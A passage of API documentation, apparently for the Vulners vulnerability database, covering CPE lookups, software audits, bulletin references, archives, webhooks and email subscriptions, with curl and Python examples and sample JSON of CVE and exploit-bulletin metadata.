"availabilityImpact": "PARTIAL",
"baseScore": 6.5
},
"severity": "MEDIUM",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH"
}
},
"href": "https://download.saintcorporation.com/cgi-bin/exploit_info/ivanti_connect_secure_ssrf",
"cvelist": [
"CVE-2024-21888"
],
"lastseen": "2024-02-12T13:22:09",
"ai_score": {
"value": 7.6,
"uncertanity": 2.5,
"vector": "NONE"
}
},
{
"id": "SAINT:60BDA75642503EC398357486212FA6C7",
"type": "saint",
"bulletinFamily": "exploit",
"title": "Invanti Connect Secure and Policy Secure authentication bypass and command injection",
"description": "Added: 01/18/2024 \n\n\n### Background\n\n[Ivanti Connect Secure](<https://www.ivanti.com/products/connect-secure-vpn>) is a web-based remote access VPN. \n\n### Problem\n\nAn authentication bypass vulnerability and a command injection vulnerability when exploited together could allow a remote unauthenticated attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the appropriate patch for your Ivanti product when available, or import the `mitigation.release.20240107.1.xml` file as a workaround. See the [Invanti knowledgebase article](<https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways>) for more information. \n\n### References\n\n<https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways> \n \n\n",
"published": "2024-01-18T00:00:00",
"modified": "2024-01-18T00:00:00",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL"
}
},
"href": "https://download.saintcorporation.com/cgi-bin/exploit_info/ivanti_connect_secure_cmd_inj",
"cvelist": [
"CVE-2023-46805",
"CVE-2024-21887"
],
"lastseen": "2024-02-12T13:22:01",
"ai_score": {
"value": 8.6,
"uncertanity": 2.4,
"vector": "NONE"
}
},
{
"id": "SAINT:CBB2F1CA8B177BA96AECA3D1FB0C7611",
"type": "saint",
"bulletinFamily": "exploit",
"title": "Invanti Connect Secure and Policy Secure authentication bypass and command injection",
"description": "Added: 01/18/2024 \n\n\n### Background\n\n[Ivanti Connect Secure](<https://www.ivanti.com/products/connect-secure-vpn>) is a web-based remote access VPN. \n\n### Problem\n\nAn authentication bypass vulnerability and a command injection vulnerability when exploited together could allow a remote unauthenticated attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the appropriate patch for your Ivanti product when available, or import the `mitigation.release.20240107.1.xml` file as a workaround. See the [Invanti knowledgebase article](<https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways>) for more information. \n\n### References\n\n<https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways> \n \n\n",
"published": "2024-01-18T00:00:00",
"modified": "2024-01-18T00:00:00",
"cvss": {
"score": 6.4,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
},
"severity": "MEDIUM",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"cvss3": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"cvssV3": {
"version": "3.0",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "HIGH",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL"
}
},
"href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ivanti_connect_secure_cmd_inj",
"cvelist": [
"CVE-2023-46805",
"CVE-2024-21887"
],
"lastseen": "2024-02-04T12:52:55",
"ai_score": {
"value": 8.7,
"uncertanity": 2.4,
"vector": "NONE"
}
}
]
]
Vulnerabilities by CPE product¶
To obtain all vulnerabilities, specify the CPE product and version as a string. CPE 2.3 consists of different parameters that can help identify a software product more accurately:
cpe:<cpe_version>:<part>:<vendor>:<product>:<version>:<update>:<edition>:<language>:<sw_edition>:<target_sw>:<target_hw>:<other>
It can be used some parts of the CPE to improve the accuracy of the vulnerability search
Required parameters:
- software (str): Common Platform Enumeration (CPE) identifier for the software. (e.g.,
cpe:/a:microsoft:windows_10:1909
) - apiKey: Activated API key to authenticate the request.
Optional parameters:
- version: software version. Also, can be mention in
software
field. - respect_major_version (str): If
true
, limits results to the specified major version. Default isfalse
. - exclude_any_version (str): If
true
, excludes extended versions and returns only the exact match. Default isfalse
. - only_ids (bool): If
true
, returns only the IDs of the vulnerabilities. Default isfalse
.
Additional CPE attributes for refining search accuracy:
-
update (str): Specifies the software update version to refine the search for vulnerabilities related to a specific update level. Examples include
service packs
(e.gsp1
) for Windows, patch versions, hotfixes, or other minor updates.Official NIST 7695 for
update
Values for this attribute SHOULD be vendor-specific alphanumeric strings characterizing the particular update, service pack, or point release of the product. Values for this attribute SHOULD be selected from an attribute-specific valid-values list, which MAY be defined by other specifications that utilize this specification.
-
language (str): Defines the language edition of the software, if applicable. Use this to target vulnerabilities in localized versions of the software.
Official NIST 7695 for
language
Values for this attribute SHALL be valid language tags as defined by [RFC5646], and SHOULD be used to define the language supported in the user interface of the product being described. Although any valid language tag MAY be used, only tags containing language and region codes SHOULD be used.
-
sw_edition (str): Indicates the specific edition of the software. (e.g.,
home_premium
for Windows,continuous
for Acrobat Reader, orserver
for Linux)Official NIST 7695 for
sw_edition
Values for this attribute SHOULD characterize how the product is tailored to a particular market or class of end users. Values for this attribute SHOULD be selected from an attribute-specific valid-values list, which MAY be defined by other specifications that utilize this specification. Any character string meeting the requirements for WFNs (cf. 5.3.2) MAY be specified as the value of the attribute.
-
target_sw (str): Specifies the platform where the software runs, such as
windows
,macOS
,linux
, or other environments likejava
,chrome
,azure
, etc. If not specified, the search will include software that runs on*
orwindows
platforms.Official NIST 7695 for
target_sw
Values for this attribute SHOULD characterize the software computing environment within which the product operates. Values for this attribute SHOULD be selected from an attribute-specific valid-values list, which MAY be defined by other specifications that utilize this specification.
-
target_hw (str): Identifies the hardware platform for the software, such as
x86
,x64
,arm
, or specific devices likerouter
ormobile
.Official NIST 7695 for
target_hw
Values for this attribute SHOULD characterize the instruction set architecture (e.g.,
x86
) on which the product being described or identified by the WFN operates. Bytecode-intermediate languages, such as Java bytecode for the Java Virtual Machine or Microsoft Common Intermediate Language for the Common Language Runtime virtual machine, SHALL be considered instruction set architectures.
Possible values for CPE parameters:
*
: Includes all values, both those containing - or * and without."-"
: Filters results to exclude specified values.."software_name"
: Includes results with this value and any values containing*
.
Defaults:
By default, the target_sw
is set to windows, so if platform isn't specified, it will search for vulnerabilities in software running on *
or windows
. It helps avoid defaults from platforms like Android or macOS.
Query:
POST /api/v3/burp/softwareapi/
Query example for CPE identifier:
curl -XPOST https://vulners.com/api/v3/burp/softwareapi/ -H 'Content-Type: application/json' -d '{
"software": "cpe:2.3:o:microsoft:windows_10:1909:sp1:enterprise:en:windows",
"type": "cpe",
"maxVulnerabilities": 50,
"respect_major_version": "true",
"exclude_any_version": "false",
"only_ids": false,
"apiKey": "{API key}"
}'
cpe_results = vulners_api.get_cpe_vulnerabilities(
cpe="cpe:2.3:o:microsoft:windows_10:1909:sp1:enterprise:en:windows",
respect_major_version='true',
exclude_any_version='false',
only_ids='false'
)
cpe_exploit_list = cpe_results.get('exploit')
cpe_vulnerabilities_list = [cpe_results.get(key) for key in cpe_results if key not in ['info', 'blog', 'bugbounty']]
{
"vulnerabilities": [
{
"id": "CVE-2022-29132",
"title": "Remote Code Execution Vulnerability",
"description": "Details about Windows server vulnerability...",
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-29132",
"cvelist": ["CVE-2022-29132"],
"lastseen": "2024-09-11T19:08:41",
"cpe": [
"cpe:/o:microsoft:windows_server_2012:r2:::",
"cpe:/o:microsoft:windows_server:20h2:::",
"cpe:/o:microsoft:windows_10:21h1:::"
// Truncated for brevity
],
"cpe23": [
"cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"
// Truncated for brevity
],
"cvss": {
"score": 8.0,
"severity": "HIGH",
"vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"baseScore": 6.5,
"baseSeverity": "MEDIUM"
}
},
"affectedSoftware": [
{
"cpeName": "microsoft:windows_10",
"version": "-",
"operator": "eq",
"name": "microsoft windows 10"
},
{
"cpeName": "microsoft:windows_10",
"version": "21h1",
"operator": "eq",
"name": "microsoft windows 10"
}
// Truncated for brevity
],
"ai_score": {
"value": 8.0,
"uncertainty": 0.1
}
},
{
"id": "CVE-2022-29137",
"title": "Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability",
"description": "Details about LDAP vulnerability...",
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-29137",
"cvelist": ["CVE-2022-29137"],
"lastseen": "2024-09-11T19:14:24",
"cpe": [
"cpe:/o:microsoft:windows_server_2012:r2:::",
"cpe:/o:microsoft:windows_server_2019:-:::",
"cpe:/o:microsoft:windows_10:21h1:::"
// Truncated for brevity
],
"cpe23": [
"cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*",
"cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*"
// Truncated for brevity
],
"cvss": {
"score": 8.8,
"severity": "HIGH",
"vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"baseScore": 6.5,
"baseSeverity": "MEDIUM"
}
},
"affectedSoftware": [
{
"cpeName": "microsoft:windows_server_2012",
"version": "r2",
"operator": "eq",
"name": "microsoft windows server 2012"
},
{
"cpeName": "microsoft:windows_10",
"version": "21h1",
"operator": "eq",
"name": "microsoft windows 10"
}
// Truncated for brevity
],
"ai_score": {
"value": 8.7,
"uncertainty": 0.1
}
}
]
Software Audit¶
This method helps to identify security vulnerabilities (CVEs) in the software installed on the operating system. By providing detailed information about the software (name
, version
, and optional parameters such as update
, language
, sw_edition
, etc.), it can provide more accurate and relevant vulnerability data in the results. The more information you provide, the better the API can match vulnerabilities to the auditing software.
Required parameters:
- os (str): Operating system name
- version (str): Operating system version
-
packages (list): List of dictionaries containing software and version information, with optional CPE parameters.
Example:
{ "software": "Mozilla Firefox", "version": "117.0", "sw_edition": "home_premium", "target_sw": "windows", "target_hw": "x64", "update": "sp2", "language": "en" }
-
apiKey: Activated API key
Additional CPE attributes for refining search accuracy:
-
update (str): Specifies the software update version to refine the search for vulnerabilities related to a specific update level. Examples include
service packs
(e.gsp1
) for Windows, patch versions, hotfixes, or other minor updates.Official NIST 7695 for
update
Values for this attribute SHOULD be vendor-specific alphanumeric strings characterizing the particular update, service pack, or point release of the product. Values for this attribute SHOULD be selected from an attribute-specific valid-values list, which MAY be defined by other specifications that utilize this specification.
-
language (str): Defines the language edition of the software, if applicable. Use this to target vulnerabilities in localized versions of the software.
Official NIST 7695 for
language
Values for this attribute SHALL be valid language tags as defined by [RFC5646], and SHOULD be used to define the language supported in the user interface of the product being described. Although any valid language tag MAY be used, only tags containing language and region codes SHOULD be used.
-
sw_edition (str): Indicates the specific edition of the software. (e.g.,
home_premium
for Windows,continuous
for Acrobat Reader, orserver
for Linux)Official NIST 7695 for
sw_edition
Values for this attribute SHOULD characterize how the product is tailored to a particular market or class of end users. Values for this attribute SHOULD be selected from an attribute-specific valid-values list, which MAY be defined by other specifications that utilize this specification. Any character string meeting the requirements for WFNs (cf. 5.3.2) MAY be specified as the value of the attribute.
-
target_sw (str): Specifies the platform where the software runs, such as
windows
,macOS
,linux
, or other environments likejava
,chrome
,azure
, etc. If not specified, the search will include software that runs on*
orwindows
platforms.Official NIST 7695 for
target_sw
Values for this attribute SHOULD characterize the software computing environment within which the product operates. Values for this attribute SHOULD be selected from an attribute-specific valid-values list, which MAY be defined by other specifications that utilize this specification.
-
target_hw (str): Identifies the hardware platform for the software, such as
x86
,x64
,arm
, or specific devices likerouter
ormobile
.Official NIST 7695 for
target_hw
Values for this attribute SHOULD characterize the instruction set architecture (e.g.,
x86
) on which the product being described or identified by the WFN operates. Bytecode-intermediate languages, such as Java bytecode for the Java Virtual Machine or Microsoft Common Intermediate Language for the Common Language Runtime virtual machine, SHALL be considered instruction set architectures.
Possible values for CPE parameters:
*
: Includes all values, both those containing - or * and without."-"
: Filters results to exclude specified values.."software_name"
: Includes results with this value and any values containing*
.
Query:
POST /api/v3/burp/packages/
Query example:
curl -X POST 'https://vulners.com/api/v3/burp/packages/' \
-H 'Content-Type: application/json' \
-d '{
"os": "Ubuntu",
"osVersion": "22.04",
"packages": [
{"software": "LibreOffice", "version": "7.6.1", "sw_edition": "enterprise", "target_sw": "linux", "target_hw": "x64"}
],
"apiKey": "{API key}"
}'
packages = vulners_api.software_audit(
os='Ubuntu',
version='22.04',
packages=[
{"software": "LibreOffice", "version": "7.6.1", "sw_edition": "enterprise", "target_sw": "linux", "target_hw": "x64"}
]
)
[
{
"id": [
"CVE-2023-6185",
"CVE-2023-6186"
],
"package": "libreoffice",
"version": "7.6.1"
}
]
Get references for the vulnerability¶
Get all bulletins by identifier.
Required parameters:
- id (str): document id
- references: True or False
- apiKey: Activated API key
Query:
POST /api/v3/search/id/
Query example:
curl -X POST https://vulners.com/api/v3/search/id/ -H 'Content-Type: application/json' -d '{
"id": "CVE-2024-23622",
"fields": [
"id",
"title",
"description",
"type",
"bulletinFamily",
"cvss",
"published",
"modified",
"lastseen",
"href",
"sourceHref",
"sourceData",
"cvelist"],
"references": "True",
"apiKey": "{API key}"
}'
references = vulners_api.get_bulletin_references("CVE-2024-23622")
{
"nvd": [
{
"lastseen": "2024-09-04T15:05:23",
"description": "A stack-based buffer overflow exists in IBM Merge Healthcare eFilm Workstation license server. A remote, unauthenticated attacker can exploit this vulnerability to achieve remote code execution with SYSTEM privileges.\n",
"cvss3": {
"cvssV3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH"
}
},
"published": "2024-01-26T00:15:10",
"type": "nvd",
"title": "CVE-2024-23622",
"cwe": [
"CWE-787",
"CWE-131"
],
"bulletinFamily": "cve",
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"baseScore": 10.0,
"baseSeverity": "HIGH",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"availabilityImpact": "COMPLETE",
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
},
"cvelist": [
"CVE-2024-23622"
],
"modified": "2024-01-31T20:30:40",
"id": "NVD:CVE-2024-23622",
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-23622",
"cvss": {
"score": 9.8,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"cvelist": [
{
"lastseen": "2024-08-06T17:32:14",
"description": "A stack-based buffer overflow exists in IBM Merge Healthcare eFilm Workstation license server. A remote, unauthenticated attacker can exploit this vulnerability to achieve remote code execution with SYSTEM privileges.\n",
"cvss3": {
"cvssV3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "CHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH"
}
},
"published": "2024-01-25T23:36:03",
"type": "cvelist",
"title": "CVE-2024-23622 IBM Merge Healthcare eFilm Workstation License Server CopySLS_Request3 Buffer Overflow",
"cwe": [
"CWE-131"
],
"bulletinFamily": "cve",
"cvss2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"baseScore": 10.0,
"baseSeverity": "HIGH",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"availabilityImpact": "COMPLETE",
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
}
},
"cvelist": [
"CVE-2024-23622"
],
"modified": "2024-01-25T23:36:03",
"id": "CVELIST:CVE-2024-23622",
"href": "https://www.cve.org/CVERecord?id=CVE-2024-23622",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"prion": [
{
"lastseen": "2024-03-10T22:50:43",
"description": "A stack-based buffer overflow exists in IBM Merge Healthcare eFilm Workstation license server. A remote, unauthenticated attacker can exploit this vulnerability to achieve remote code execution with SYSTEM privileges.",
"cvss3": {
"cvssV3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL"
}
},
"published": "2024-01-26T00:15:00",
"type": "prion",
"title": "Stack overflow",
"bulletinFamily": "NVD",
"cvss2": {
"source": "[email protected]",
"type": "Secondary",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false,
"cvssV2": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0
},
"severity": "HIGH"
},
"cvelist": [
"CVE-2024-23622"
],
"modified": "2024-01-31T20:30:00",
"id": "PRION:CVE-2024-23622",
"href": "https://www.prio-n.com/kb/vulnerability/CVE-2024-23622",
"cvss": {
"score": 10.0,
"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"
}
}
]
}
Query autocompletions¶
This is helpful for general inquiries. For instance, if no other information is available, you can simply provide the title of your bulletin.
Required parameters:
- query (str): Search query by Lucene syntax
- apiKey: Activated API key
Query:
POST /api/v3/search/autocomplete/
Query example:
curl -XPOST https://vulners.com/api/v3/search/autocomplete/ -H 'Content-Type: application/json' -d '{
"query": "heartbleed",
"apiKey": "{API key}"
}'
possible_autocomplete = vulners_api.query_autocomplete("heartbleed")
[
"id:\"NMAP:SSL-HEARTBLEED.NSE\"",
"heartbleed",
"Heartbleed",
"HeartBleed",
"'heartbleed"
]
Collections¶
Get vulnerabilities for os + version¶
Required parameters:
- os: os name
- version: os version
- apiKey: Activated API key
Query:
GET /api/v3/archive/distributive/
Query example:
curl -G "https://vulners.com/api/v3/archive/distributive/" \
--data-urlencode "os=ubuntu" \
--data-urlencode "version=23.04" \
--data-urlencode "apiKey={API key}" \
--output output_data.zip
vulners_api.get_distributive("ubuntu", "23.04")
Full archive
Get collection by name¶
Required parameters:
- type (str): The collection type. See all collections here.
- datefrom (str): The start date in the format
YYYY-MM-DD
. Recommended for updating already downloaded collections. For example, use the last three days to get recent updates. - dateto: The end date in the format
YYYY-MM-DD
. Recommended for updating already downloaded collections. For example, use the last three days to get recent updates. - apiKey: The activated API key to authenticate the request.
Query:
GET /api/v3/archive/collection/
Query example:
curl -G -L "https://vulners.com/api/v3/archive/collection/" \
--data-urlencode "type=attackerkb" \
--data-urlencode "datefrom=2024-01-01" \
--data-urlencode "dateto=2024-10-30" \
--data-urlencode "apiKey={API KEY}" \
--output output_data.zip
vulners_api.get_collection('exploitdb', start_date="2024-07-14", end_date="2024-07-14")
Full archive
Get bulletin history¶
Required parameters:
- id (str): bulletin id
- apiKey: Activated API key
Query:
POST /api/v3/search/history/
Query example:
curl -XPOST https://vulners.com/api/v3/search/history/ -H 'Content-Type: application/json' -d '{
"id": "CVE-2024-23622",
"apiKey": "{API key}"
}'
vulners_api.get_bulletin_history("CVE-2024-23622")
[
{
"bulletinId": "CVE-2024-23622",
"field": "cvss3",
"value": {
"cvssV3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL"
}
},
"edition": 1,
"published": "2024-01-31T23:48:24"
},
{
"bulletinId": "CVE-2024-23622",
"field": "epss",
"value": [
{
"cve": "CVE-2024-23622",
"epss": 0.0027,
"percentile": 0.64574,
"modified": "2024-01-31"
}
],
"edition": 1,
"published": "2024-01-31T23:48:24"
},
...
]
Webhook¶
This section details the API methods for adding, listing, and modifying webhook subscriptions so that applications can quickly respond to new security threats or updates.
Add webhook¶
Required parameters:
- query: Search query using Lucene syntax. Defines the criteria for triggering the webhook.
- apiKey: Activated API key required for authentication.
Query:
POST /api/v3/subscriptions/addWebhookSubscription/
Query example:
curl -XPOST https://vulners.com/api/v3/subscriptions/addWebhookSubscription/ -H 'Content-Type: application/json' -d '{
"query": "viewCount:[50 TO *] order:viewCount last 8 days",
"apiKey": "{API key}"
}'
new_webhook = vulners_api.add_webhook("viewCount:[50 TO *] order:viewCount last 8 days")
{
"result": "OK",
"data": {
"subscriptionid": "{subscription id}",
"subscription": {
"id": "{subscription id}",
"query": "viewCount:[50 TO *] order:viewCount last 8 days",
"active": true,
"webhook": "https://vulners.com/api/v3/subscriptions/webhook?newest_only=true&subscriptionid={subscription id}&apiKey={api key}"
}
}
}
Get webhook¶
Required parameters:
- apiKey: Activated API key required for authentication.
Query:
GET /api/v3/subscriptions/listWebhookSubscriptions/
Query example:
curl -G "https://vulners.com/api/v3/subscriptions/listWebhookSubscriptions/" \
--data-urlencode "apiKey={API key}"
vulners_api.get_webhooks()
{
"result": "OK",
"data": {
"subscriptions": [
{
"id": "{subscription id}",
"query": "viewCount:[50 TO *] order:viewCount last 8 days",
"active": true,
"webhook": "https://vulners.com/api/v3/subscriptions/webhook?newest_only=true&subscriptionid={subscription id}&apiKey={api key}"
}
]
}
}
Enable/Disable webhook¶
Required parameters:
- subscription id (str): The ID of the webhook subscription to enable or disable.
- active (str): Boolean value ("true" or "false") to activate or deactivate the webhook.
- apiKey: Activated API key required for authentication.
Query:
POST /api/v3/subscriptions/enableWebhookSubscription/
Query example:
curl -XPOST https://vulners.com/api/v3/subscriptions/enableWebhookSubscription/ -H 'Content-Type: application/json' -d '{
"subscriptionid": "{subscription id}",
"active": false,
"apiKey": "{API key}"
}'
{
"result": "OK",
"data": {}
}
Read webhook¶
Required parameters:
- newest_only: Boolean value ("true" or "false") to specify if only the newest updates should be retrieved.
- subscription id: The ID of the webhook subscription to read.
- apiKey: Activated API key required for authentication.
Query:
GET /api/v3/subscriptions/webhook/
Query example:
curl -G "https://vulners.com/api/v3/subscriptions/webhook/" \
--data-urlencode "subscriptionid={subscription id}" \
--data-urlencode "newest_only=false" \
--data-urlencode "apiKey={API key}"
Search results
Email notifications¶
Email notifications (subscriptions) management via API as well as via web interface.
Get subscriptions¶
Required parameters:
- query: Search query using Lucene syntax. Defines the criteria for filtering the notifications.
- email: The email address where notifications will be sent.
- format: The format in which the notification email will be sent (e.g., HTML, JSON).
- crontab: A schedule for the notifications using the Unix-like cron syntax.
- query_type: Specifies the type of query, typically "lucene".
- apiKey: Activated API key required for authentication.
Query:
GET /api/v3/subscriptions/listEmailSubscriptions/
Query example:
curl -X GET 'https://vulners.com/api/v3/subscriptions/listEmailSubscriptions/?apiKey=apikey'
subsctiptions = vulners_api.get_subscriptions()
{
"result": "OK",
"data": {
"subscriptions": [
{
"id": "3C5SC5C5IS6DG9HE8BG470LBWBJWU0GTO2OAN93DLUJCSCH3SYWO1S13I8K17DSB",
"active": false,
"confirmed": false,
"query": "viewCount:[50 TO *] order:viewCount last 5 days",
"query_type": "lucene",
"link_query": "/search?query=viewCount%3A%5B50%20TO%20%2A%5D%20order%3AviewCount%20last%205%20days",
"crontab": "0 0 * * *",
"deliveryAddress": "[email protected]",
"deliveryFormat": "html"
}
]
}
}
Add subscription¶
Required parameters:
- query: Search query using Lucene syntax. Defines the criteria for filtering the notifications.
- email: The email address where notifications will be sent.
- format: The format in which the notification email will be sent (e.g., HTML, JSON).
- crontab: A schedule for the notifications using the Unix-like cron syntax.
- query_type: Specifies the type of query, typically "lucene".
- apiKey: Activated API key required for authentication.
Query:
POST /api/v3/subscriptions/addEmailSubscription/
Query example:
curl -X POST 'https://vulners.com/api/v3/subscriptions/addEmailSubscription/' -H 'Content-Type: application/json' -d '{
"query": "viewCount:[50 TO *] order:viewCount last 5 days",
"email": "[email protected]",
"format": "html",
"crontab": "0 0 * * *",
"query_type": "lucene",
"apiKey": "{API key}"
}'
add_subscription = vulners_api.add_subscription("viewCount:[50 TO *] order:viewCount last 9 days",
email="[email protected]")
{
"result": "OK",
"data": {
"id": "{subscription id}",
"active": false,
"confirmed": false,
"query": "viewCount:[50 TO *] order:viewCount last 5 days",
"query_type": "lucene",
"link_query": "/search?query=viewCount%3A%5B50%20TO%20%2A%5D%20order%3AviewCount%20last%205%20days",
"crontab": "0 0 * * *",
"deliveryAddress": "[email protected]",
"deliveryFormat": "html"
}
}
Edit subscription¶
Required parameters:
- subscriptionid: The ID of the subscription to be edited.
- format: The new format for the notifications (e.g., HTML, JSON).
- crontab: The new schedule for the notifications using the Unix-like cron syntax.
- active: Boolean value to activate (true) or deactivate (false) the subscription.
- apiKey: Activated API key required for authentication.
Query:
POST api/v3/subscriptions/editEmailSubscription/
Query example:
curl -X POST 'https://vulners.com/api/v3/subscriptions/editEmailSubscription/' -H 'Content-Type: application/json' -d '{
"subscriptionid": "{subscription id}",
"format": "json",
"crontab": "0 1 * * *",
"active": "false",
"apiKey": "{API key}"
}'
edit_subscription = vulners_api.edit_subscription(
